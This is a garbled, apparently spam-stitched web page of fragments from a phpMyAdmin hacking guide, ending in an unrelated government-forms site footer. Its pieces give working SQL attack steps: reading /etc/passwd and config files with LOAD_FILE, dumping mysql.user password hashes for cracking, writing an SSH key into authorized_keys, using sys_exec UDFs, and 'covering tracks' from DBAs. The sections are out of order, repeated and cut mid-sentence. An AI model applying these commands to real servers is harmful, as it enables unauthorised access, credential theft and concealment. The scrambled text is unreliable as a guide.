Phpmyadmin Hacktricks [2021] -
SELECT "ssh-rsa AAAAB3..." INTO OUTFILE '/home/user/.ssh/authorized_keys' Use sys_exec() UDF or MySQL’s lib_mysqludf_sys . Part 5: Post-Exploitation – Covering Tracks DBA’s don’t like surprises. Clear your steps:
SHOW VARIABLES LIKE "secure_file_priv"; If secure_file_priv blocks you, use general log : phpmyadmin hacktricks
SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.php'); Look for database passwords, SSH keys, API tokens. SELECT user, authentication_string FROM mysql.user; Crack them with John or Hashcat (caching_sha2_password is tougher, but mysql_native_password is crackable). 4.3 Write SSH Authorized Keys If you can write to /root/.ssh/ or user's home: SELECT "ssh-rsa AAAAB3
Introduction phpMyAdmin is the world’s most popular MySQL/MariaDB administration tool. While it is a godsend for database administrators, it is a prime target for penetration testers. Misconfigurations, default installations, weak credentials, and outdated versions often turn it into the "golden key" that leads to Remote Code Execution (RCE), privilege escalation, and full server compromise. SELECT user, authentication_string FROM mysql
Visit, Share & Follow : www.muraipanamanna.in | Govt. Orders, Circulars, Software, Income Tax, Forms, SPARK, Service Help, Etc